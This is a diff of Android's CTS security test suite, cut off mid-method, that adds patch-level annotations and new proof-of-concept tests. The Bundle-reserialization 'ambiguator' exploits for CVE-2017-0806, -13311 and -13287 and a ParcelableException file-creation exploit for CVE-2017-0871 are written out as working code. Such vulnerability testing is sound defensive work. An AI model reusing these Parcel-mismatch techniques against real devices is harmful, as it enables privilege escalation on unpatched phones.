public void testAllocateJavaPixelRefIntOverflow() {
InputStream exploitImage = mContext.getResources().openRawResource(
R.raw.cve_2015_1531_b_19270126);
diff --git a/tests/tests/security/src/android/security/cts/AmbiguousBundlesTest.java b/tests/tests/security/src/android/security/cts/AmbiguousBundlesTest.java
index dc74708..47dc8f3 100644
--- a/tests/tests/security/src/android/security/cts/AmbiguousBundlesTest.java
+++ b/tests/tests/security/src/android/security/cts/AmbiguousBundlesTest.java
@@ -33,117 +33,322 @@
public class AmbiguousBundlesTest extends AndroidTestCase {
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-05")
+ public void test_android_CVE_2017_0806() throws Exception {
+ Ambiguator ambiguator = new Ambiguator() {
+ @Override
+ public Bundle make(Bundle preReSerialize, Bundle postReSerialize) throws Exception {
+ Random random = new Random(1234);
+ int minHash = 0;
+ for (String s : preReSerialize.keySet()) {
+ minHash = Math.min(minHash, s.hashCode());
+ }
+ for (String s : postReSerialize.keySet()) {
+ minHash = Math.min(minHash, s.hashCode());
+ }
+
+ String key;
+ int keyHash;
+
+ do {
+ key = randomString(random);
+ keyHash = key.hashCode();
+ } while (keyHash >= minHash);
+
+ padBundle(postReSerialize, preReSerialize.size() + 1, minHash, random);
+ padBundle(preReSerialize, postReSerialize.size() - 1, minHash, random);
+
+ String key2;
+ int key2Hash;
+ do {
+ key2 = makeStringToInject(postReSerialize, random);
+ key2Hash = key2.hashCode();
+ } while (key2Hash >= minHash || key2Hash <= keyHash);
+
+
+ Parcel parcel = Parcel.obtain();
+
+ parcel.writeInt(preReSerialize.size() + 2);
+ parcel.writeString(key);
+
+ parcel.writeInt(VAL_PARCELABLE);
+ parcel.writeString("android.service.gatekeeper.GateKeeperResponse");
+
+ parcel.writeInt(0);
+ parcel.writeInt(0);
+ parcel.writeInt(0);
+
+ parcel.writeString(key2);
+ parcel.writeInt(VAL_NULL);
+
+ writeBundleSkippingHeaders(parcel, preReSerialize);
+
+ parcel.setDataPosition(0);
+ Bundle bundle = new Bundle();
+ parcelledDataField.set(bundle, parcel);
+ return bundle;
+ }
+
+ @Override
+ protected String makeStringToInject(Bundle stuffToInject, Random random) {
+ Parcel p = Parcel.obtain();
+ p.writeInt(0);
+ p.writeInt(0);
+
+ Parcel p2 = Parcel.obtain();
+ stuffToInject.writeToParcel(p2, 0);
+ int p2Len = p2.dataPosition() - BUNDLE_SKIP;
+
+ for (int i = 0; i < p2Len / 4 + 4; i++) {
+ int paddingVal;
+ if (i > 3) {
+ paddingVal = i;
+ } else {
+ paddingVal = random.nextInt();
+ }
+ p.writeInt(paddingVal);
+
+ }
+
+ p.appendFrom(p2, BUNDLE_SKIP, p2Len);
+ p2.recycle();
+
+ while (p.dataPosition() % 8 != 0) p.writeInt(0);
+ for (int i = 0; i < 2; i++) {
+ p.writeInt(0);
+ }
+
+ int len = p.dataPosition() / 2 - 1;
+ p.writeInt(0); p.writeInt(0);
+ p.setDataPosition(0);
+ p.writeInt(len);
+ p.writeInt(len);
+ p.setDataPosition(0);
+ String result = p.readString();
+ p.recycle();
+ return result;
+ }
+ };
+
+ testAmbiguator(ambiguator);
+ }
+
+
+
+ @SecurityTest(minPatchLevel = "2018-05")
+ public void test_android_CVE_2017_13311() throws Exception {
+ Ambiguator ambiguator = new Ambiguator() {
+ @Override
+ public Bundle make(Bundle preReSerialize, Bundle postReSerialize) throws Exception {
+ Random random = new Random(1234);
+ int minHash = 0;
+ for (String s : preReSerialize.keySet()) {
+ minHash = Math.min(minHash, s.hashCode());
+ }
+ for (String s : postReSerialize.keySet()) {
+ minHash = Math.min(minHash, s.hashCode());
+ }
+
+ String key;
+ int keyHash;
+
+ do {
+ key = randomString(random);
+ keyHash = key.hashCode();
+ } while (keyHash >= minHash);
+
+ padBundle(postReSerialize, preReSerialize.size(), minHash, random);
+ padBundle(preReSerialize, postReSerialize.size(), minHash, random);
+
+ Parcel parcel = Parcel.obtain();
+
+ parcel.writeInt(preReSerialize.size() + 1);
+ parcel.writeString(key);
+
+ parcel.writeInt(VAL_OBJECTARRAY);
+ parcel.writeInt(3);
+
+ parcel.writeInt(VAL_PARCELABLE);
+ parcel.writeString("com.android.internal.app.procstats.ProcessStats");
+
+ parcel.writeInt(PROCSTATS_MAGIC);
+ parcel.writeInt(PROCSTATS_PARCEL_VERSION);
+ parcel.writeInt(PROCSTATS_STATE_COUNT);
+ parcel.writeInt(PROCSTATS_ADJ_COUNT);
+ parcel.writeInt(PROCSTATS_PSS_COUNT);
+ parcel.writeInt(PROCSTATS_SYS_MEM_USAGE_COUNT);
+ parcel.writeInt(PROCSTATS_SPARSE_MAPPING_TABLE_ARRAY_SIZE);
+
+ parcel.writeLong(0);
+ parcel.writeLong(0);
+ parcel.writeLong(0);
+ parcel.writeLong(0);
+ parcel.writeLong(0);
+ parcel.writeString(null);
+ parcel.writeInt(0);
+ parcel.writeInt(0);
+
+ parcel.writeInt(0);
+ parcel.writeInt(0);
+ parcel.writeInt(1);
+ parcel.writeInt(1);
+ parcel.writeInt(0);
+
+ for (int i = 0; i < PROCSTATS_ADJ_COUNT; i++) {
+ parcel.writeInt(0);
+ }
+
+ parcel.writeInt(0);
+ parcel.writeInt(1);
+ parcel.writeInt(0);
+
+ parcel.writeInt(0);
+ parcel.writeInt(0);
+ parcel.writeInt(1);
+ parcel.writeInt(VAL_LONGARRAY);
+ parcel.writeString("AAAAA");
+ parcel.writeInt(0);
+
+ parcel.writeInt(VAL_INTEGER);
+ parcel.writeInt(0);
+ parcel.writeInt(VAL_BUNDLE);
+ parcel.writeBundle(postReSerialize);
+
+ writeBundleSkippingHeaders(parcel, preReSerialize);
+
+ parcel.setDataPosition(0);
+ Bundle bundle = new Bundle();
+ parcelledDataField.set(bundle, parcel);
+ return bundle;
+ }
+
+ @Override
+ protected String makeStringToInject(Bundle stuffToInject, Random random) {
+ return null;
+ }
+ };
+
+ testAmbiguator(ambiguator);
+ }
+
+ @SecurityTest(minPatchLevel = "2018-04")
public void test_android_CVE_2017_13287() throws Exception {
+ Ambiguator ambiguator = new Ambiguator() {
+ @Override
+ public Bundle make(Bundle preReSerialize, Bundle postReSerialize) throws Exception {
+ Random random = new Random(1234);
+ int minHash = 0;
+ for (String s : preReSerialize.keySet()) {
+ minHash = Math.min(minHash, s.hashCode());
+ }
+ for (String s : postReSerialize.keySet()) {
+ minHash = Math.min(minHash, s.hashCode());
+ }
+
+ String key;
+ int keyHash;
+
+ do {
+ key = randomString(random);
+ keyHash = key.hashCode();
+ } while (keyHash >= minHash);
+
+ padBundle(postReSerialize, preReSerialize.size() + 1, minHash, random);
+ padBundle(preReSerialize, postReSerialize.size() - 1, minHash, random);
+
+ String key2;
+ int key2Hash;
+ do {
+ key2 = makeStringToInject(postReSerialize, random);
+ key2Hash = key2.hashCode();
+ } while (key2Hash >= minHash || key2Hash <= keyHash);
+
+
+ Parcel parcel = Parcel.obtain();
+
+ parcel.writeInt(preReSerialize.size() + 2);
+ parcel.writeString(key);
+
+ parcel.writeInt(VAL_PARCELABLE);
+ parcel.writeString("com.android.internal.widget.VerifyCredentialResponse");
+
+ parcel.writeInt(0);
+ parcel.writeInt(0);
+
+ parcel.writeString(key2);
+ parcel.writeInt(VAL_NULL);
+
+ writeBundleSkippingHeaders(parcel, preReSerialize);
+
+ parcel.setDataPosition(0);
+ Bundle bundle = new Bundle();
+ parcelledDataField.set(bundle, parcel);
+ return bundle;
+ }
+
+ @Override
+ protected String makeStringToInject(Bundle stuffToInject, Random random) {
+ Parcel p = Parcel.obtain();
+ p.writeInt(0);
+ p.writeInt(0);
+
+ Parcel p2 = Parcel.obtain();
+ stuffToInject.writeToParcel(p2, 0);
+ int p2Len = p2.dataPosition() - BUNDLE_SKIP;
+
+ for (int i = 0; i < p2Len / 4 + 4; i++) {
+ int paddingVal;
+ if (i > 3) {
+ paddingVal = i;
+ } else {
+ paddingVal = random.nextInt();
+ }
+ p.writeInt(paddingVal);
+
+ }
+
+ p.appendFrom(p2, BUNDLE_SKIP, p2Len);
+ p2.recycle();
+
+ while (p.dataPosition() % 8 != 0) p.writeInt(0);
+ for (int i = 0; i < 2; i++) {
+ p.writeInt(0);
+ }
+
+ int len = p.dataPosition() / 2 - 1;
+ p.writeInt(0); p.writeInt(0);
+ p.setDataPosition(0);
+ p.writeInt(len);
+ p.writeInt(len);
+ p.setDataPosition(0);
+ String result = p.readString();
+ p.recycle();
+ return result;
+ }
+ };
+
+ testAmbiguator(ambiguator);
+ }
+
+ private void testAmbiguator(Ambiguator ambiguator) {
Bundle bundle;
- {
- Bundle verifyMe = new Bundle();
- verifyMe.putString("cmd", "something_safe");
- Bundle useMe = new Bundle();
- useMe.putString("cmd", "replaced_thing");
- Ambiguator a = new Ambiguator() {
- @Override
- public Bundle make(Bundle preReSerialize, Bundle postReSerialize) throws Exception {
- Random random = new Random(1234);
- int minHash = 0;
- for (String s : preReSerialize.keySet()) {
- minHash = Math.min(minHash, s.hashCode());
- }
- for (String s : postReSerialize.keySet()) {
- minHash = Math.min(minHash, s.hashCode());
- }
+ Bundle verifyMe = new Bundle();
+ verifyMe.putString("cmd", "something_safe");
+ Bundle useMe = new Bundle();
+ useMe.putString("cmd", "replaced_thing");
- String key;
- int keyHash;
+ try {
+ bundle = ambiguator.make(verifyMe, useMe);
- do {
- key = randomString(random);
- keyHash = key.hashCode();
- } while (keyHash >= minHash);
+ bundle = reparcel(bundle);
+ String value1 = bundle.getString("cmd");
+ bundle = reparcel(bundle);
+ String value2 = bundle.getString("cmd");
- padBundle(postReSerialize, preReSerialize.size() + 1, minHash, random);
- padBundle(preReSerialize, postReSerialize.size() - 1, minHash, random);
-
- String key2;
- int key2Hash;
- do {
- key2 = makeStringToInject(postReSerialize, random);
- key2Hash = key2.hashCode();
- } while (key2Hash >= minHash || key2Hash <= keyHash);
-
-
- Parcel parcel = Parcel.obtain();
-
- parcel.writeInt(preReSerialize.size() + 2);
- parcel.writeString(key);
-
- parcel.writeInt(VAL_PARCELABLE);
- parcel.writeString("com.android.internal.widget.VerifyCredentialResponse");
-
- parcel.writeInt(0);
- parcel.writeInt(0);
-
- parcel.writeString(key2);
- parcel.writeInt(VAL_NULL);
-
- writeBundleSkippingHeaders(parcel, preReSerialize);
-
- parcel.setDataPosition(0);
- Bundle bundle = new Bundle();
- parcelledDataField.set(bundle, parcel);
- return bundle;
- }
-
- @Override
- protected String makeStringToInject(Bundle stuffToInject, Random random) {
- Parcel p = Parcel.obtain();
- p.writeInt(0);
- p.writeInt(0);
-
- Parcel p2 = Parcel.obtain();
- stuffToInject.writeToParcel(p2, 0);
- int p2Len = p2.dataPosition() - BUNDLE_SKIP;
-
- for (int i = 0; i < p2Len / 4 + 4; i++) {
- int paddingVal;
- if (i > 3) {
- paddingVal = i;
- } else {
- paddingVal = random.nextInt();
- }
- p.writeInt(paddingVal);
-
- }
-
- p.appendFrom(p2, BUNDLE_SKIP, p2Len);
- p2.recycle();
-
- while (p.dataPosition() % 8 != 0) p.writeInt(0);
- for (int i = 0; i < 2; i++) {
- p.writeInt(0);
- }
-
- int len = p.dataPosition() / 2 - 1;
- p.writeInt(0); p.writeInt(0);
- p.setDataPosition(0);
- p.writeInt(len);
- p.writeInt(len);
- p.setDataPosition(0);
- String result = p.readString();
- p.recycle();
- return result;
- }
- };
- bundle = a.make(verifyMe, useMe);
- }
-
- bundle = reparcel(bundle);
- String value1 = bundle.getString("cmd");
- bundle = reparcel(bundle);
- String value2 = bundle.getString("cmd");
-
- if (!value1.equals(value2)) {
- fail("String " + value1 + "!=" + value2 + " after reparceling.");
+ if (!value1.equals(value2)) {
+ fail("String " + value1 + "!=" + value2 + " after reparceling.");
+ }
+ } catch (Exception e) {
}
}
@@ -159,10 +364,23 @@
static abstract class Ambiguator {
- protected static final int VAL_PARCELABLE = 4;
protected static final int VAL_NULL = -1;
+ protected static final int VAL_INTEGER = 1;
+ protected static final int VAL_BUNDLE = 3;
+ protected static final int VAL_PARCELABLE = 4;
+ protected static final int VAL_OBJECTARRAY = 17;
+ protected static final int VAL_INTARRAY = 18;
+ protected static final int VAL_LONGARRAY = 19;
protected static final int BUNDLE_SKIP = 12;
+ protected static final int PROCSTATS_MAGIC = 0x50535454;
+ protected static final int PROCSTATS_PARCEL_VERSION = 21;
+ protected static final int PROCSTATS_STATE_COUNT = 14;
+ protected static final int PROCSTATS_ADJ_COUNT = 8;
+ protected static final int PROCSTATS_PSS_COUNT = 7;
+ protected static final int PROCSTATS_SYS_MEM_USAGE_COUNT = 16;
+ protected static final int PROCSTATS_SPARSE_MAPPING_TABLE_ARRAY_SIZE = 4096;
+
protected final Field parcelledDataField;
public Ambiguator() throws Exception {
diff --git a/tests/tests/security/src/android/security/cts/AudioSecurityTest.java b/tests/tests/security/src/android/security/cts/AudioSecurityTest.java
index 3495191..56cff46 100644
--- a/tests/tests/security/src/android/security/cts/AudioSecurityTest.java
+++ b/tests/tests/security/src/android/security/cts/AudioSecurityTest.java
@@ -90,6 +90,7 @@
}
// b/28173666
+ @SecurityTest(minPatchLevel = "2016-07")
public void testAllEffectsGetParameterAttemptOffload_CVE_2016_3745() throws Exception {
testAllEffects("get parameter attempt offload",
new TestEffect() {
@@ -103,6 +104,7 @@
// b/32438594
// b/32624850
// b/32635664
+ @SecurityTest(minPatchLevel = "2017-03")
public void testAllEffectsGetParameter2AttemptOffload_CVE_2017_0398() throws Exception {
testAllEffects("get parameter2 attempt offload",
new TestEffect() {
@@ -114,6 +116,7 @@
}
// b/30204301
+ @SecurityTest(minPatchLevel = "2016-10")
public void testAllEffectsSetParameterAttemptOffload_CVE_2016_3924() throws Exception {
testAllEffects("set parameter attempt offload",
new TestEffect() {
@@ -125,6 +128,7 @@
}
// b/37536407
+ @SecurityTest(minPatchLevel = "2017-01")
public void testAllEffectsEqualizer_CVE_2017_0401() throws Exception {
testAllEffects("equalizer get parameter name",
new TestEffect() {
@@ -351,6 +355,7 @@
private static final int VISUALIZER_PARAM_CAPTURE_SIZE = 0;
// b/31781965
+ @SecurityTest(minPatchLevel = "2017-03")
public void testVisualizerCapture_CVE_2017_0396() throws Exception {
// Capture params
final int CAPTURE_SIZE = 1 << 24; // 16MB seems to be large enough to cause a SEGV.
diff --git a/tests/tests/security/src/android/security/cts/BannedFilesTest.java b/tests/tests/security/src/android/security/cts/BannedFilesTest.java
index 8847a84..46b5ba9 100644
--- a/tests/tests/security/src/android/security/cts/BannedFilesTest.java
+++ b/tests/tests/security/src/android/security/cts/BannedFilesTest.java
@@ -148,6 +148,24 @@
assertNotSetugid("/vendor/bin/tcpdump-arm");
}
+ /**
+ * enforce that the xaac codec has not been included on the device
+ */
+ public void testNoXaac() {
+ String libraries[] = new String[] {
+ "libstagefright_soft_xaacdec.so", "libstagefright_soft_c2xaacdec.so"
+ };
+ String directories[] = new String[] {
+ "/system/lib", "/system/lib64", "/vendor/lib", "/vendor/lib64"
+ };
+ for (String f : libraries) {
+ for (String d : directories) {
+ String fullPath = d + "/" + f;
+ assertFalse(fullPath, new File(fullPath).exists());
+ }
+ }
+ }
+
private static void assertNotSetugid(String file) {
FileUtils.FileStatus fs = new FileUtils.FileStatus();
if (!FileUtils.getFileStatus(file, fs, false)) {
diff --git a/tests/tests/security/src/android/security/cts/BigRleTest.java b/tests/tests/security/src/android/security/cts/BigRleTest.java
index f3c2302..bcfb1df 100644
--- a/tests/tests/security/src/android/security/cts/BigRleTest.java
+++ b/tests/tests/security/src/android/security/cts/BigRleTest.java
@@ -22,6 +22,7 @@
import java.io.InputStream;
+import android.platform.test.annotations.SecurityTest;
import android.security.cts.R;
public class BigRleTest extends AndroidTestCase {
@@ -31,6 +32,7 @@
* This image reports that its encoded length is over 4 gigs. Prior to fixing issue 33251605,
* we attempted to allocate space for all the encoded data at once, resulting in OOM.
*/
+ @SecurityTest(minPatchLevel = "2017-04")
public void test_android_bug_33251605() {
InputStream exploitImage = mContext.getResources().openRawResource(R.raw.bug_33251605);
Bitmap bitmap = BitmapFactory.decodeStream(exploitImage);
diff --git a/tests/tests/security/src/android/security/cts/BitmapFactoryDecodeStreamTest.java b/tests/tests/security/src/android/security/cts/BitmapFactoryDecodeStreamTest.java
index 1fa0b65..ce28a7a 100644
--- a/tests/tests/security/src/android/security/cts/BitmapFactoryDecodeStreamTest.java
+++ b/tests/tests/security/src/android/security/cts/BitmapFactoryDecodeStreamTest.java
@@ -33,6 +33,7 @@
* to heap corruption by trying to open a crafted PNG image with incorrect
* npTc chunk.
*/
+ @SecurityTest(minPatchLevel = "2015-01")
public void testNinePatchHeapOverflow() throws Exception {
InputStream inStream = new BufferedInputStream(mContext.getResources().openRawResource(
R.raw.cve_2015_1532));
@@ -40,13 +41,14 @@
}
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void testPocCVE_2017_0691() throws Exception {
InputStream exploitImage = new BufferedInputStream(mContext.getResources().openRawResource(
R.raw.cve_2017_0691));
BitmapFactory.decodeStream(exploitImage);
}
+ @SecurityTest(minPatchLevel = "2017-12")
public void test_b65290323() throws Exception {
InputStream exploitImage = new BufferedInputStream(mContext.getResources().openRawResource(
R.raw.b65290323));
diff --git a/tests/tests/security/src/android/security/cts/BitmapFactorySecurityTests.java b/tests/tests/security/src/android/security/cts/BitmapFactorySecurityTests.java
index 2272dc0..8ffe485 100644
--- a/tests/tests/security/src/android/security/cts/BitmapFactorySecurityTests.java
+++ b/tests/tests/security/src/android/security/cts/BitmapFactorySecurityTests.java
@@ -58,6 +58,7 @@
/**
* Verifies that decoding a corrupt ICO does crash.
*/
+ @SecurityTest(minPatchLevel = "2017-09")
public void test_android_bug_38116746() {
FileDescriptor exploitImage = getResource(R.raw.bug_38116746);
try {
@@ -73,6 +74,7 @@
/**
* Verifies that decoding a corrupt BMP does crash.
*/
+ @SecurityTest(minPatchLevel = "2017-08")
public void test_android_bug_37627194() {
FileDescriptor exploitImage = getResource(R.raw.bug_37627194);
try {
diff --git a/tests/tests/security/src/android/security/cts/BitmapTest.java b/tests/tests/security/src/android/security/cts/BitmapTest.java
index 6253f0a..632ab96 100644
--- a/tests/tests/security/src/android/security/cts/BitmapTest.java
+++ b/tests/tests/security/src/android/security/cts/BitmapTest.java
@@ -33,6 +33,7 @@
* OOME is more appropriate.
*/
@Test(expected=OutOfMemoryError.class)
+ @SecurityTest(minPatchLevel = "2018-01")
public void test_33846679() {
// This size is based on the max size possible in a GIF file,
// which might be passed to createBitmap from a Java decoder.
diff --git a/tests/tests/security/src/android/security/cts/BrowserTest.java b/tests/tests/security/src/android/security/cts/BrowserTest.java
index de8763e..becbc5e 100644
--- a/tests/tests/security/src/android/security/cts/BrowserTest.java
+++ b/tests/tests/security/src/android/security/cts/BrowserTest.java
@@ -138,6 +138,7 @@
/**
* See Bug 6212665 for detailed information about this issue.
*/
+ @SecurityTest(minPatchLevel = "2012-01")
public void testBrowserPrivateDataAccess() throws Throwable {
// Yucky workaround to let us launch file:// Uris
StrictMode.setVmPolicy(new StrictMode.VmPolicy.Builder().build());
diff --git a/tests/tests/security/src/android/security/cts/DecodeTest.java b/tests/tests/security/src/android/security/cts/DecodeTest.java
index 0e92310..3314166 100644
--- a/tests/tests/security/src/android/security/cts/DecodeTest.java
+++ b/tests/tests/security/src/android/security/cts/DecodeTest.java
@@ -32,7 +32,7 @@
* Prior to fixing bug 34778578, decoding this file would crash. Instead, it should fail to
* decode.
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-07")
public void test_android_bug_34778578() {
InputStream exploitImage = mContext.getResources().openRawResource(R.raw.bug_34778578);
Bitmap bitmap = BitmapFactory.decodeStream(exploitImage);
@@ -45,7 +45,7 @@
* Prior to fixing bug 67381469, decoding this file would crash. Instead, it should fail to
* decode.
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-12")
public void test_android_bug_67381469() {
InputStream exploitImage = mContext.getResources().openRawResource(R.raw.bug_67381469);
Bitmap bitmap = BitmapFactory.decodeStream(exploitImage);
diff --git a/tests/tests/security/src/android/security/cts/EffectBundleTest.java b/tests/tests/security/src/android/security/cts/EffectBundleTest.java
index ae55494..d1baf37 100644
--- a/tests/tests/security/src/android/security/cts/EffectBundleTest.java
+++ b/tests/tests/security/src/android/security/cts/EffectBundleTest.java
@@ -48,6 +48,7 @@
private static final int intSize = 4;
//Testing security bug: 32436341
+ @SecurityTest(minPatchLevel = "2017-01")
public void testEqualizer_getParamCenterFreq() throws Exception {
if (!hasEqualizer()) {
return;
@@ -57,6 +58,7 @@
}
//Testing security bug: 32588352
+ @SecurityTest(minPatchLevel = "2017-01")
public void testEqualizer_getParamCenterFreq_long() throws Exception {
if (!hasEqualizer()) {
return;
@@ -65,6 +67,7 @@
}
//Testing security bug: 32438598
+ @SecurityTest(minPatchLevel = "2017-01")
public void testEqualizer_getParamBandLevel() throws Exception {
if (!hasEqualizer()) {
return;
@@ -73,6 +76,7 @@
}
//Testing security bug: 32584034
+ @SecurityTest(minPatchLevel = "2017-01")
public void testEqualizer_getParamBandLevel_long() throws Exception {
if (!hasEqualizer()) {
return;
@@ -81,6 +85,7 @@
}
//Testing security bug: 32247948
+ @SecurityTest(minPatchLevel = "2017-01")
public void testEqualizer_getParamFreqRange() throws Exception {
if (!hasEqualizer()) {
return;
@@ -90,6 +95,7 @@
}
//Testing security bug: 32588756
+ @SecurityTest(minPatchLevel = "2017-01")
public void testEqualizer_getParamFreqRange_long() throws Exception {
if (!hasEqualizer()) {
return;
@@ -99,6 +105,7 @@
}
//Testing security bug: 32448258
+ @SecurityTest(minPatchLevel = "2017-01")
public void testEqualizer_getParamPresetName() throws Exception {
if (!hasEqualizer()) {
return;
@@ -107,6 +114,7 @@
}
//Testing security bug: 32588016
+ @SecurityTest(minPatchLevel = "2017-01")
public void testEqualizer_getParamPresetName_long() throws Exception {
if (!hasEqualizer()) {
return;
@@ -147,6 +155,7 @@
}
//testing security bug: 32095626
+ @SecurityTest(minPatchLevel = "2017-01")
public void testEqualizer_setParamBandLevel() throws Exception {
if (!hasEqualizer()) {
return;
@@ -162,6 +171,7 @@
}
//testing security bug: 32585400
+ @SecurityTest(minPatchLevel = "2017-01")
public void testEqualizer_setParamBandLevel_long() throws Exception {
if (!hasEqualizer()) {
return;
@@ -177,6 +187,7 @@
}
//testing security bug: 32705438
+ @SecurityTest(minPatchLevel = "2017-02")
public void testEqualizer_getParamFreqRangeCommand_short() throws Exception {
if (!hasEqualizer()) {
return;
@@ -186,6 +197,7 @@
}
//testing security bug: 32703959
+ @SecurityTest(minPatchLevel = "2017-02")
public void testEqualizer_getParamFreqRangeCommand_long() throws Exception {
if (!hasEqualizer()) {
return;
@@ -195,6 +207,7 @@
}
//testing security bug: 37563371 (short media)
+ @SecurityTest(minPatchLevel = "2017-09")
public void testEqualizer_setParamProperties_short() throws Exception {
if (!hasEqualizer()) {
return;
@@ -204,6 +217,7 @@
}
//testing security bug: 37563371 (long media)
+ @SecurityTest(minPatchLevel = "2017-09")
public void testEqualizer_setParamProperties_long() throws Exception {
if (!hasEqualizer()) {
return;
@@ -213,7 +227,7 @@
}
//Testing security bug: 63662938
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-10")
public void testDownmix_setParameter() throws Exception {
verifyZeroPVSizeRejectedForSetParameter(
EFFECT_TYPE_DOWNMIX, new int[] { DOWNMIX_PARAM_TYPE });
@@ -229,7 +243,7 @@
private static final int DOWNMIX_PARAM_TYPE = 0;
//Testing security bug: 63526567
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-10")
public void testEnvironmentalReverb_setParameter() throws Exception {
verifyZeroPVSizeRejectedForSetParameter(
AudioEffect.EFFECT_TYPE_ENV_REVERB, new int[] {
@@ -249,7 +263,7 @@
}
//Testing security bug: 67647856
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-01")
public void testPresetReverb_setParameter() throws Exception {
verifyZeroPVSizeRejectedForSetParameter(
AudioEffect.EFFECT_TYPE_PRESET_REVERB, new int[] {
diff --git a/tests/tests/security/src/android/security/cts/MediaRecorderInfoLeakTest.java b/tests/tests/security/src/android/security/cts/MediaRecorderInfoLeakTest.java
new file mode 100644
index 0000000..4252614
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/MediaRecorderInfoLeakTest.java
@@ -0,0 +1,58 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import android.media.MediaRecorder;
+import android.test.AndroidTestCase;
+
+@SecurityTest
+public class MediaRecorderInfoLeakTest extends AndroidTestCase {
+
+ /**
+ * b/27855172
+ */
+ @SecurityTest(minPatchLevel = "2016-06")
+ public void test_cve_2016_2499() throws Exception {
+ MediaRecorder mediaRecorder = null;
+ try {
+ for (int i = 0; i < 1000; i++) {
+ mediaRecorder = new MediaRecorder();
+ mediaRecorder.setAudioSource(MediaRecorder.AudioSource.DEFAULT);
+ mediaRecorder.setVideoSource(MediaRecorder.VideoSource.SURFACE);
+ mediaRecorder.setOutputFormat(MediaRecorder.OutputFormat.THREE_GPP);
+ mediaRecorder.setAudioEncoder(MediaRecorder.AudioEncoder.AAC);
+ mediaRecorder.setVideoEncoder(MediaRecorder.VideoEncoder.H263);
+ mediaRecorder.setVideoFrameRate(30);
+ mediaRecorder.setVideoSize(352, 288);
+ mediaRecorder.setOutputFile("/sdcard/record.output");
+ mediaRecorder.prepare();
+ int test = mediaRecorder.getMaxAmplitude();
+ mediaRecorder.release();
+ if(test != 0){
+ fail("MediaRecorderInfoLeakTest failed");
+ }
+ }
+ } catch (Exception e) {
+ fail("Media Recorder Exception" + e.getMessage());
+ } finally {
+ if (mediaRecorder != null){
+ mediaRecorder.release();
+ }
+ }
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/Movie33897722.java b/tests/tests/security/src/android/security/cts/Movie33897722.java
index 3e36fa8..efc050f 100644
--- a/tests/tests/security/src/android/security/cts/Movie33897722.java
+++ b/tests/tests/security/src/android/security/cts/Movie33897722.java
@@ -39,6 +39,7 @@
* larger than 2. Ensure that we do not attempt to read colors from beyond the end of the
* color map, which would be reading memory that we do not control, and may be uninitialized.
*/
+ @SecurityTest(minPatchLevel = "2017-06")
public void test_android_bug_33897722() {
// The image has a 10 x 10 frame on top of a transparent background. Only test the
// 10 x 10 frame, since the original bug would never have used uninitialized memory
diff --git a/tests/tests/security/src/android/security/cts/NativeCodeTest.java b/tests/tests/security/src/android/security/cts/NativeCodeTest.java
index 77d75d8..2e101a5 100644
--- a/tests/tests/security/src/android/security/cts/NativeCodeTest.java
+++ b/tests/tests/security/src/android/security/cts/NativeCodeTest.java
@@ -107,7 +107,7 @@
*/
private static native boolean doPerfEventTest2();
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2017-01")
public void testCVE20141710() throws Exception {
assertTrue("Device is vulnerable to CVE-2014-1710", doCVE20141710Test());
}
diff --git a/tests/tests/security/src/android/security/cts/PackageSignatureTest.java b/tests/tests/security/src/android/security/cts/PackageSignatureTest.java
index 72aff71..556031b 100644
--- a/tests/tests/security/src/android/security/cts/PackageSignatureTest.java
+++ b/tests/tests/security/src/android/security/cts/PackageSignatureTest.java
@@ -113,7 +113,10 @@
// Test package to verify upgrades to privileged applications
"com.android.cts.priv.ctsshim",
- "com.android.cts.ctsshim"
+ "com.android.cts.ctsshim",
+
+ // Oom Catcher package to prevent tests from ooming device.
+ "com.android.cts.oomcatcher"
));
diff --git a/tests/tests/security/src/android/security/cts/ParcelableExceptionTest.java b/tests/tests/security/src/android/security/cts/ParcelableExceptionTest.java
new file mode 100644
index 0000000..a024e50
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/ParcelableExceptionTest.java
@@ -0,0 +1,69 @@
+/*
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.test.AndroidTestCase;
+import android.platform.test.annotations.SecurityTest;
+import android.security.cts.R;
+
+import android.content.Context;
+import android.content.Intent;
+import android.os.BaseBundle;
+import android.os.Bundle;
+import android.os.Parcel;
+import android.util.Log;
+
+import java.io.File;
+import java.lang.reflect.Field;
+
+@SecurityTest
+public class ParcelableExceptionTest extends AndroidTestCase {
+
+ @SecurityTest(minPatchLevel = "2017-12")
+ public void test_CVE_2017_0871() throws Exception {
+ String filePath = "/data/system/" + System.currentTimeMillis();
+ File file = new File(filePath);
+ Bundle bundle = createBundle("java.io.FileOutputStream", filePath);
+ sendBundleToSystem(bundle);
+ assertFalse(file.exists());
+ }
+
+ private Bundle createBundle(String className, String constructorArgument) throws Exception {
+ Parcel data = Parcel.obtain();
+ data.writeInt(1);
+ data.writeString("a");
+ data.writeInt(4);
+ data.writeString("android.os.ParcelableException");
+ data.writeString(className);
+ data.writeString(constructorArgument);
+
+ Bundle bundle = new Bundle();
+ Field parcelledDataField = BaseBundle.class.getDeclaredField("mParcelledData");
